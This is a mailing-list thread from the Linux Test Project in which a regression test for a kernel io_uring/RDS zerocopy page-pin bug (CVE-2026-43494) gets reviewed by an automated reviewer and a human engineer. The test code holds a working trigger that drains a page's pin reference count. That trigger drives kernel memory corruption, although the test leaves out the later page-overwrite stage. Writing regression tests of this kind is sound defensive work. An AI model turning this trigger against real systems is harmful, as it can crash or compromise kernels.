+ * Allocate two adjacent pages: the first one will be pinned as an
+ * io_uring fixed buffer, and the second one will be made inaccessible.
+ */
+ mapped_pages = SAFE_MMAP(NULL, 2 * page_size, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mapped_pages, 0xa5, page_size);
+
+ /*
+ * RDS should successfully pin the first page, then fault on the second.
+ * That fault drives the buggy zerocopy error cleanup path.
+ */
+ SAFE_MPROTECT((char *)mapped_pages + page_size, page_size, PROT_NONE);
+
+ fixed_iov.iov_base = mapped_pages;
+ fixed_iov.iov_len = page_size;
+
+ /*
+ * Register only the first page as an io_uring fixed buffer. This creates
+ * the long-term page pin whose reference accounting the RDS bug damages.
+ */
+ if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1))
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
+
+ /*
+ * Clone the fixed buffer registration into the second ring, matching the
+ * public reproducer's lifetime pattern without performing the later
+ * page-cache overwrite stage.
+ */
+ if (clone_buffers(ring_fd2, ring_fd1)) {
+ if (errno == EINVAL || errno == EOPNOTSUPP)
+ tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
+ }
+}
+
+static void trigger(void)
+{
+ struct sockaddr_in bind_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = 0,
+ };
+ struct sockaddr_in dst_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ };
+ char control[CMSG_SPACE(sizeof(uint32_t))];
+ struct cmsghdr *cmsg;
+ struct iovec iov = {
+ .iov_base = mapped_pages,
+ .iov_len = 2 * page_size,
+ };
+ struct msghdr msg = {
+ .msg_name = &dst_addr,
+ .msg_namelen = sizeof(dst_addr),
+ .msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = control,
+ .msg_controllen = sizeof(control),
+ };
+ int ret;
+ int val;
+ int i, efaults, first_bad_errno = 0;
+
+ /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
+ val = 1;
+ if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
+ if (errno == ENOPROTOOPT || errno == EINVAL)
+ tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
+ }
+
+ val = 2 * page_size * 4;
+ SAFE_SETSOCKOPT(rds_fd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val));
+
+ /*
+ * Bind to a kernel-assigned loopback port and send to the next port
+ * (unbound). The sends are expected to fail before any useful delivery;
+ * the faulting iovec is the interesting part.
+ */
+ SAFE_BIND(rds_fd, (struct sockaddr *)&bind_addr, sizeof(bind_addr));
+ dst_addr.sin_port = htons(TST_GETSOCKPORT(rds_fd) + 1);
+
+ memset(control, 0, sizeof(control));
+ cmsg = (struct cmsghdr *)control;
+ cmsg->cmsg_level = SOL_RDS;
+ cmsg->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
+ cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));
+
+ /*
+ * Each send pins page 0, faults on page 1 (PROT_NONE), and on a
+ * vulnerable kernel double-drops page 0's reference. EFAULT is the
+ * expected error; other errors do not count as successful steals.
+ */
+ for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
+ /* rds_cmsg_zcopy() in net/rds/send.c */
+ *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
+
+ ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
+ if (ret >= 0)
+ tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
+
+ if (errno == EFAULT)
+ efaults++;
+ else if (!first_bad_errno)
+ first_bad_errno = errno;
+ }
+
+ if (first_bad_errno) {
+ tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
+ first_bad_errno, tst_strerrno(first_bad_errno));
+ }
+
+ tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ if (efaults == 0)
+ tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
+
+ if (efaults < GUP_PIN_COUNTING_BIAS)
+ tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
+ efaults, GUP_PIN_COUNTING_BIAS);
+}
+
+static void poke_rss_accounting(void)
+{
+ char *mem;
+
+ mem = SAFE_MMAP(NULL, RSS_CHECK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mem, 0x5a, RSS_CHECK_SIZE);
+ SAFE_MUNMAP(mem, RSS_CHECK_SIZE);
+}
+
+static void run(void)
+{
+ pid_t pid;
+ int i;
+
+ /*
+ * Run the dangerous part in a child so that process teardown can expose
+ * delayed RSS/page-accounting damage before the parent reports TPASS.
+ */
+ pid = SAFE_FORK();
+ if (!pid) {
+ trigger();
+ exit(0);
+ }
+
+ tst_reap_children();
+
+ /*
+ * Unregistering fixed buffers after FOLL_PIN has been drained triggers
+ * the double-unpin WARN/BUG_ON on vulnerable kernels.
+ */
+ io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted after buffer unregistration");
+ return;
+ }
+
+ /*
+ * The visible failure can be delayed until another mm is torn down.
+ * Fork all RSS children in parallel, then reap and check taint once.
+ */
+ for (i = 0; i < RSS_CHECK_CHILDREN; i++) {
+ pid = SAFE_FORK();
+ if (!pid) {
+ poke_rss_accounting();
+ exit(0);
+ }
+ }
+
+ tst_reap_children();
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RSS accounting checks");
+ return;
+ }
+
+ /*
+ * RDS/page cleanup can run asynchronously after userspace returns from
+ * sendmsg() and after file descriptors are closed. Wait before declaring
+ * that the kernel merely "seems" to have survived.
+ */
+ for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
+ sleep(1);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RDS zerocopy cleanup");
+ return;
+ }
+ }
+
+ tst_res(TPASS, "Kernel seems to have survived RDS zerocopy cleanup");
+}
+
+static void cleanup(void)
+{
+ if (ring_fd2 >= 0) {
+ io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ SAFE_CLOSE(ring_fd2);
+ }
+
+ if (ring_fd1 >= 0) {
+ io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ SAFE_CLOSE(ring_fd1);
+ }
+
+ if (rds_fd >= 0)
+ SAFE_CLOSE(rds_fd);
+
+ if (mapped_pages) {
+ SAFE_MUNMAP(mapped_pages, 2 * page_size);
+ mapped_pages = NULL;
+ }
+}
+
+static struct tst_test test = {
+ .test_all = run,
+ .setup = setup,
+ .cleanup = cleanup,
+ .timeout = 60,
+ .forks_child = 1,
+ .taint_check = TST_TAINT_W | TST_TAINT_D,
+ .needs_kconfigs = (const char *[]) {
+ "CONFIG_RDS",
+ "CONFIG_RDS_TCP",
+ "CONFIG_IO_URING",
+ NULL
+ },
+ .save_restore = (const struct tst_path_val[]) {
+ {"/proc/sys/kernel/io_uring_disabled", "0",
+ TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
+ {}
+ },
+ .tags = (const struct tst_tag[]) {
+ {"linux-git", "e17492979319"},
+ {"CVE", "2026-43494"},
+ {}
+ }
+};
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 19+ messages in thread
* Re: [LTP] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks
2026-06-04 16:38 ` [LTP] [PATCH v5 1/2] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks Sebastian Chlad
2026-06-04 16:38 ` [LTP] [PATCH v5 2/2] io_uring04: Add CVE-2026-43494 regression test Sebastian Chlad
@ 2026-06-04 18:00 ` linuxtestproject.agent
1 sibling, 0 replies; 19+ messages in thread
From: linuxtestproject.agent @ 2026-06-04 18:00 UTC (permalink / raw)
To: Sebastian Chlad; +Cc: ltp
Hi Sebastian,
On Thu, 4 Jun 2026, Sebastian Chlad wrote:
> lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks
--- [PATCH 2/2] ---
testcases/kernel/syscalls/io_uring/.gitignore lists io_uring01..io_uring03
but the new io_uring04 binary is not added to it.
> + ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
> + if (ret >= 0)
> + tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
> +
> + if (errno == EFAULT)
> + efaults++;
sendmsg() is the subject syscall here and must be wrapped in TEST()
rather than called bare. Switch to TST_RET / TST_ERR instead of
ret / errno.
> + if (efaults < GUP_PIN_COUNTING_BIAS)
> + tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN "
> + "counter may not be fully drained",
> + efaults, GUP_PIN_COUNTING_BIAS);
When fewer than GUP_PIN_COUNTING_BIAS sends returned EFAULT the pin
reference counter is not fully drained. The test then continues to
unregister buffers and can end with TPASS without having exercised
the vulnerable path.
TWARN is not sufficient here; the run should be aborted with TCONF
or TBROK so the incomplete trigger is not silently reported as a pass.
> + for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
> + sleep(1);
> +
> + if (tst_taint_check()) {
sleep() must not be used for synchronization even inside a polling
loop. For deferred kernel actions the expected pattern is an
exponential-backoff polling loop, e.g. TST_RETRY_FN_EXP_BACKOFF().
Verdict: Needs revision
---
Note:
The agent can sometimes produce false positives although often its
findings are genuine. If you find issues with the review, please
comment this email or ignore the suggestions.
Regards,
LTP AI Reviewer
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* Re: [LTP] [PATCH v5 2/2] io_uring04: Add CVE-2026-43494 regression test
2026-06-04 16:38 ` [LTP] [PATCH v5 2/2] io_uring04: Add CVE-2026-43494 regression test Sebastian Chlad
@ 2026-06-05 15:30 ` Martin Doucha
0 siblings, 0 replies; 19+ messages in thread
From: Martin Doucha @ 2026-06-05 15:30 UTC (permalink / raw)
To: Sebastian Chlad, ltp; +Cc: Sebastian Chlad
Hi,
one minor suggestion below, otherwise for both patches:
Reviewed-by: Martin Doucha <mdoucha@suse.cz>
On 6/4/26 18:38, Sebastian Chlad wrote:
> + /*
> + * Each send pins page 0, faults on page 1 (PROT_NONE), and on a
> + * vulnerable kernel double-drops page 0's reference. EFAULT is the
> + * expected error; other errors do not count as successful steals.
> + */
> + for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
AFAICT, you need to get GUP_PIN_COUNTING_BIAS EFAULTs to successfully
reproduce the main bug. It might be better to change the loop condition
like this:
for (...; efaults < GUP_PIN_COUNTING_BISA && i < 10 *
GUP_PIN_COUNTING_BIAS; ...) {
Then you'll have some extra margin for exhausting the pin counter even
if you can't steal a pin in every iteration. Though I suppose triggering
enough EFAULTs not a problem at the moment.
> + /* rds_cmsg_zcopy() in net/rds/send.c */
> + *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
> +
> + ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
> + if (ret >= 0)
> + tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
> +
> + if (errno == EFAULT)
> + efaults++;
> + else if (!first_bad_errno)
> + first_bad_errno = errno;
> + }
> +
> + if (first_bad_errno) {
> + tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
> + first_bad_errno, tst_strerrno(first_bad_errno));
> + }
> +
> + tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
> + efaults, GUP_PIN_COUNTING_BIAS);
> +
> + if (efaults == 0)
> + tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
> +
> + if (efaults < GUP_PIN_COUNTING_BIAS)
> + tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
> + efaults, GUP_PIN_COUNTING_BIAS);
> +}
--
Martin Doucha mdoucha@suse.cz
SW Quality Engineer
SUSE LINUX, s.r.o.
CORSO IIa
Krizikova 148/34
186 00 Prague 8
Czech Republic
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
end of thread, other threads:[~2026-06-05 15:31 UTC | newest]
Thread overview: 19+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-05-23 10:17 [LTP] [PATCH] io_uring/pintheft: Add CVE-2026-43494 regression test Sebastian Chlad
2026-05-23 11:19 ` [LTP] " linuxtestproject.agent
2026-05-25 9:36 ` Cyril Hrubis
2026-05-29 10:18 ` Andrea Cervesato via ltp
2026-05-29 11:56 ` Cyril Hrubis
2026-05-23 11:39 ` [LTP] [PATCH v2] " Sebastian Chlad
2026-05-23 13:30 ` [LTP] " linuxtestproject.agent
2026-05-23 15:10 ` [LTP] [PATCH v3] " Sebastian Chlad
2026-05-23 16:17 ` [LTP] " linuxtestproject.agent
2026-05-23 16:57 ` [LTP] [PATCH v4] " Sebastian Chlad
2026-05-23 18:07 ` [LTP] " linuxtestproject.agent
2026-05-24 18:16 ` [LTP] [PATCH v4] " Petr Vorel
2026-05-28 16:45 ` Martin Doucha
2026-05-28 21:31 ` Petr Vorel
2026-05-28 16:36 ` Martin Doucha
2026-06-04 16:38 ` [LTP] [PATCH v5 1/2] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks Sebastian Chlad
2026-06-04 16:38 ` [LTP] [PATCH v5 2/2] io_uring04: Add CVE-2026-43494 regression test Sebastian Chlad
2026-06-05 15:30 ` Martin Doucha
2026-06-04 18:00 ` [LTP] lapi: Add io_uring_clone_buffers and RDS_CMSG_ZCOPY_COOKIE fallbacks linuxtestproject.agent
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.